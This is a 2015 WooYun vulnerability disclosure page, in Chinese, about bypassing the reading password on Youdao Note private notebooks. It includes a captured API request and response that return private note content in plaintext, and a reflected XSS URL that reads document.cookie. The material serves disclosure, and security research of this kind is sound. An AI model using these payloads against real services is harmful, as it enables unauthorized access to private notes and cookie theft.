当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090655

漏洞标题:绕过有道云笔记阅读密码

相关厂商:网易

漏洞作者: Forever80s

提交时间:2015-01-08 15:45

修复时间:2015-02-22 15:46

公开时间:2015-02-22 15:46

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-08: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经确认,细节仅向厂商公开
2015-01-19: 细节向核心白帽子及相关领域专家公开
2015-01-29: 细节向普通白帽子公开
2015-02-08: 细节向实习白帽子公开
2015-02-22: 细节向公众公开

简要描述:

详细说明:

漏洞证明:

我是有道云笔记的粉丝,今天闲来无事测试一下
笔记有一个功能是私密笔记本,阅读时候需要输入阅读密码,那么我们就可以把重要的东西放进去很保密。当点击其他笔记本时候有阅读密码的笔记本会自动锁定。

00Capture.PNG


设计不当1:私密笔记本附件可以任意读取
找到笔记本地存储目录

1Capture.PNG


目录里文件夹名字是笔记的校验和

2Capture.PNG


然后我们找一下私密笔记有没有本地文件?是否加密?

3Capture.PNG


4Capture.PNG


答案是否定的,本地私密笔记的附件未作任何加密处理
综合,本地私密笔记附件是可以访问的。
设计不当2:私密笔记内容任意查看
因为是云笔记嘛,手机,电脑,web。
尝试从客户端登陆web(客户端授权-->web ,这里客户端是登陆状态,但是我们没有阅读密码也没有登陆密码)
找客户端的跳转链接 ,点击邀请好友(前提我浏览器清理过所有的cookie)

1Capture.PNG


经过跨域授权一系列跳转进入网站,这时候我们是不能进入126 163 的域的授权的,这里只youdao.com

2Capture.PNG


这时候点击邮箱图标的,需要密码才能进入邮箱
那么我们进入web云笔记

3Capture.PNG


web私密笔记同样需要输入密码

4Capture.PNG


但是设计有缺陷,我们点击私密笔记并抓包

5Capture.PNG


私密笔记内容一览无余,看到JSON中"encrypted":0 亮了,经测试不论多少私密笔记都会以json数组形式明文返回

payload:
POST /yws/mapi/search?method=get&keyfrom=web HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://note.youdao.com/web/list?notebook=%2FFBFBFA20CF98469F9BF19C1F53C1E772&sortMode=0&note=%2F6EDExxx
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Proxy-Connection: Keep-Alive
Content-Length: 70
Host: note.youdao.com
Pragma: no-cache
Cookie: xxxx
nb=%2FFBFBFA20xxxx
response:
HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 08 Jan 2015 05:05:33 GMT
Content-Type: text/json; charset=UTF-8
Content-Length: 589
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: zh-CN
Cache-Control: no-cache
[1,[{"d":0,"tl":"??¥è?°1","mt":1420693290,"nn":0,"tg":"","sc":0,"checksum":"758d018393527ab0dcf1e185e21c4c60","favorite":0,"ct":1420693196,"au":"","v":3563,"encrypted":0,"r":0,"p":"/FBFBFA20CF98469F9BF19C1F53C1E772/8AC2996E50B642EA9788D57B844F3399","su":"","created_product":"YNote-PC","ng":"","del":0,"pp":{"nbtl":"é??èˉ??ˉ?????μ?èˉ?","dg":"??ˉ????????¨??·??????lisdfte??ˉ????ˉ???????te3st999332","thmurl":null,"WHOLE_FILE_TYPE":"OMAPFILE","ressize":"0","tp":"2","FILE_IDENTIFIER":"6B6A960617DC48DC8567DFB16D40A469","spaceused":"303","resnum":"1"},"et":0,"sz":3814,"er":0,"ps":0,"dr":0}]]


总之,绕过密码保护的私密笔记所有内容。
ps:送一个302 强大xss

http://note.youdao.com/signIn/index.html?&callback=javascript:alert%28document.cookie%29

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-01-09 13:11

厂商回复:

感谢您对网易的关注,前两个问题并不是安全漏洞,后一个漏洞已修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-08 22:42 | 小指头 ( 实习白帽子 | Rank:97 漏洞数:19 | 不想当大拇指的小指头,不是个好手。)

    要不是送了个XSS,这是要忽略啊